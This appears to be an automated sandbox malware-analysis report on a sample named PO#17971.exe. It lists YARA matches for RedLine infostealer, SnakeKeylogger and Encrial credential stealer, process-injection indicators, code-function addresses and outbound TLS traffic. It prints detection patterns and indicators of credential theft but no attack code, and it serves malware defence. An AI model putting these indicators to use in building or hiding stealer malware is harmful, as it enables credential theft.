Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49756 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.2.TZRtlifudvO.exe.36453a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 16.2.vbc.exe.8d70000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.vbc.exe.8d70000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.vbc.exe.8d70000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.vbc.exe.6e9fe5e.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.vbc.exe.6e9fe5e.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.vbc.exe.6e9fe5e.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 16.2.vbc.exe.6810000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.vbc.exe.6810000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.vbc.exe.6810000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.PO#17971.exe.3e94d08.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.PO#17971.exe.3ce5100.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 16.2.vbc.exe.6810f20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.vbc.exe.6810f20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.vbc.exe.6810f20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.vbc.exe.6e9fe5e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.vbc.exe.6e9fe5e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.vbc.exe.6e9fe5e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.vbc.exe.6810f20.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.vbc.exe.6810f20.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.vbc.exe.6810f20.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.vbc.exe.6810000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.vbc.exe.6810000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.vbc.exe.6810000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.vbc.exe.6ea0d7e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.vbc.exe.6ea0d7e.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.vbc.exe.6ea0d7e.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.vbc.exe.6ea0d7e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.vbc.exe.6ea0d7e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.vbc.exe.6ea0d7e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.vbc.exe.8d70000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.vbc.exe.8d70000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.vbc.exe.8d70000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000009.00000002.4510131451.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000009.00000002.4512089318.0000000006E5F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: Process Memory Space: vbc.exe PID: 7192, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: vbc.exe PID: 7584, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: PO#17971.exe

Source: C:\Users\user\Desktop\PO#17971.exe	Code function: 0_2_02A24204	0_2_02A24204
Source: C:\Users\user\Desktop\PO#17971.exe	Code function: 0_2_02A27B08	0_2_02A27B08
Source: C:\Users\user\Desktop\PO#17971.exe	Code function: 0_2_070D869C	0_2_070D869C
Source: C:\Users\user\Desktop\PO#17971.exe	Code function: 0_2_070D85DC	0_2_070D85DC
Source: C:\Users\user\Desktop\PO#17971.exe	Code function: 0_2_07102528	0_2_07102528
Source: C:\Users\user\Desktop\PO#17971.exe	Code function: 0_2_07103F10	0_2_07103F10
Source: C:\Users\user\Desktop\PO#17971.exe	Code function: 0_2_0710E638	0_2_0710E638
Source: C:\Users\user\Desktop\PO#17971.exe	Code function: 0_2_0710E62B	0_2_0710E62B
Source: C:\Users\user\Desktop\PO#17971.exe	Code function: 0_2_0710251A	0_2_0710251A
Source: C:\Users\user\Desktop\PO#17971.exe	Code function: 0_2_0710E5FE	0_2_0710E5FE
Source: C:\Users\user\Desktop\PO#17971.exe	Code function: 0_2_0710F848	0_2_0710F848
Source: C:\Users\user\Desktop\PO#17971.exe	Code function: 0_2_072445E3	0_2_072445E3
Source: C:\Users\user\Desktop\PO#17971.exe	Code function: 0_2_07247510	0_2_07247510
Source: C:\Users\user\Desktop\PO#17971.exe	Code function: 0_2_07249458	0_2_07249458
Source: C:\Users\user\Desktop\PO#17971.exe	Code function: 0_2_072474F2	0_2_072474F2
Source: C:\Users\user\Desktop\PO#17971.exe	Code function: 0_2_072481A9	0_2_072481A9
Source: C:\Users\user\Desktop\PO#17971.exe	Code function: 0_2_072481B8	0_2_072481B8
Source: C:\Users\user\Desktop\PO#17971.exe	Code function: 0_2_07247D70	0_2_07247D70
Source: C:\Users\user\Desktop\PO#17971.exe	Code function: 0_2_07247D80	0_2_07247D80
Source: C:\Users\user\Desktop\PO#17971.exe	Code function: 0_2_07247948	0_2_07247948
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_00408C60	9_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_0040DC11	9_2_0040DC11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_00407C3F	9_2_00407C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_00418CCC	9_2_00418CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_00406CA0	9_2_00406CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_004028B0	9_2_004028B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_0041A4BE	9_2_0041A4BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_00418244	9_2_00418244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_00401650	9_2_00401650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_00402F20	9_2_00402F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_004193C4	9_2_004193C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_00418788	9_2_00418788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_00402F89	9_2_00402F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_00402B90	9_2_00402B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_004073A0	9_2_004073A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_0700D7B8	9_2_0700D7B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_07007630	9_2_07007630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_0700A598	9_2_0700A598
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_0700C4E0	9_2_0700C4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_0700D4EE	9_2_0700D4EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_0700D20C	9_2_0700D20C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_0700CF30	9_2_0700CF30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_07006EA8	9_2_07006EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_0700EEE0	9_2_0700EEE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_07002EF8	9_2_07002EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_0700CC58	9_2_0700CC58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_0700C980	9_2_0700C980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_0700586F	9_2_0700586F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_0700C6A8	9_2_0700C6A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_07004311	9_2_07004311
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_0700EED4	9_2_0700EED4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_09F6AB18	9_2_09F6AB18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_09F6A430	9_2_09F6A430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_09F69CD8	9_2_09F69CD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_09F6E908	9_2_09F6E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_09F6E8F8	9_2_09F6E8F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_09F6AB0B	9_2_09F6AB0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_09F60D70	9_2_09F60D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_09F60D6F	9_2_09F60D6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_09F6EEA0	9_2_09F6EEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_09F6EE93	9_2_09F6EE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_09F6E055	9_2_09F6E055
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_09F6E058	9_2_09F6E058
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_09F60280	9_2_09F60280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_09F60274	9_2_09F60274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_09F68220	9_2_09F68220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_09F68210	9_2_09F68210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_09F6E4B0	9_2_09F6E4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_09F6E49F	9_2_09F6E49F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_09F6A427	9_2_09F6A427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_09F6DBF1	9_2_09F6DBF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_09F69CC8	9_2_09F69CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_09F6DC00	9_2_09F6DC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_09F6D350	9_2_09F6D350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_09F6D347	9_2_09F6D347
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_09F6F2F8	9_2_09F6F2F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_09F6F2EF	9_2_09F6F2EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_09F6D7A4	9_2_09F6D7A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_09F6D7A8	9_2_09F6D7A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_09F6F750	9_2_09F6F750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_09F6F74B	9_2_09F6F74B
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Code function: 10_2_02284204	10_2_02284204
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Code function: 10_2_022825D8	10_2_022825D8
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Code function: 10_2_02287B08	10_2_02287B08
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Code function: 10_2_056085DC	10_2_056085DC
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Code function: 10_2_0560869C	10_2_0560869C
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Code function: 10_2_05672528	10_2_05672528
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Code function: 10_2_0567E5FE	10_2_0567E5FE
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Code function: 10_2_0567E638	10_2_0567E638
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Code function: 10_2_05673F10	10_2_05673F10
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Code function: 10_2_0567F848	10_2_0567F848
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Code function: 10_2_056845D8	10_2_056845D8
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Code function: 10_2_05687510	10_2_05687510
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Code function: 10_2_05689448	10_2_05689448
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Code function: 10_2_05689458	10_2_05689458
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Code function: 10_2_056881A9	10_2_056881A9
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Code function: 10_2_056881B8	10_2_056881B8
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Code function: 10_2_05687D70	10_2_05687D70
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Code function: 10_2_05687D80	10_2_05687D80
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Code function: 10_2_05687948	10_2_05687948
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Code function: 10_2_0568F940	10_2_0568F940
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Code function: 10_2_05682BD8	10_2_05682BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_0642D7BD	16_2_0642D7BD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_064274E0	16_2_064274E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_0642C4E0	16_2_0642C4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_0642D4EA	16_2_0642D4EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_0642A598	16_2_0642A598
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_0642D216	16_2_0642D216
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_0642EEE0	16_2_0642EEE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_06422EF8	16_2_06422EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_06426EA8	16_2_06426EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_0642CF30	16_2_0642CF30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_0642CC58	16_2_0642CC58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_0642586F	16_2_0642586F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_0642C980	16_2_0642C980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_0642C6A8	16_2_0642C6A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_06424311	16_2_06424311
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_0642EED2	16_2_0642EED2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_08E5E8F8	16_2_08E5E8F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_08E5E908	16_2_08E5E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_08E5AB0A	16_2_08E5AB0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_08E5AB18	16_2_08E5AB18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_08E50D60	16_2_08E50D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_08E50D70	16_2_08E50D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_08E5EEA0	16_2_08E5EEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_08E5EE92	16_2_08E5EE92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_08E5E048	16_2_08E5E048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_08E5E058	16_2_08E5E058
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_08E50280	16_2_08E50280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_08E50273	16_2_08E50273
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_08E58220	16_2_08E58220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_08E58210	16_2_08E58210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_08E5E4A0	16_2_08E5E4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_08E5E4B0	16_2_08E5E4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_08E5A421	16_2_08E5A421
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_08E5A430	16_2_08E5A430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_08E5DBF2	16_2_08E5DBF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_08E59CC8	16_2_08E59CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_08E59CD8	16_2_08E59CD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_08E5DC00	16_2_08E5DC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_08E5F2E8	16_2_08E5F2E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_08E5F2F8	16_2_08E5F2F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_08E5D342	16_2_08E5D342
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_08E5D350	16_2_08E5D350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_08E5D7A8	16_2_08E5D7A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_08E5D798	16_2_08E5D798
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_08E5F740	16_2_08E5F740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 16_2_08E5F750	16_2_08E5F750

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: String function: 0040E1D8 appears 44 times

Source: PO#17971.exe, 00000000.00000002.2084564169.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs PO#17971.exe
Source: PO#17971.exe, 00000000.00000002.2093066845.0000000006EEC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs PO#17971.exe
Source: PO#17971.exe, 00000000.00000002.2086741217.0000000002C66000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs PO#17971.exe
Source: PO#17971.exe, 00000000.00000002.2087845896.0000000003E94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs PO#17971.exe
Source: PO#17971.exe, 00000000.00000002.2087845896.0000000003E94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs PO#17971.exe
Source: PO#17971.exe, 00000000.00000002.2093507552.00000000070A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs PO#17971.exe
Source: PO#17971.exe, 00000000.00000000.2026477172.0000000000772000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamemgYP.exe@ vs PO#17971.exe
Source: PO#17971.exe, 00000000.00000002.2087845896.0000000003C49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs PO#17971.exe
Source: PO#17971.exe, 00000000.00000002.2086741217.0000000002D74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs PO#17971.exe
Source: PO#17971.exe, 00000000.00000002.2094114410.0000000008C30000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs PO#17971.exe
Source: PO#17971.exe	Binary or memory string: OriginalFilenamemgYP.exe@ vs PO#17971.exe

Source: PO#17971.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 9.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.2.TZRtlifudvO.exe.36453a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 16.2.vbc.exe.8d70000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.vbc.exe.8d70000.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
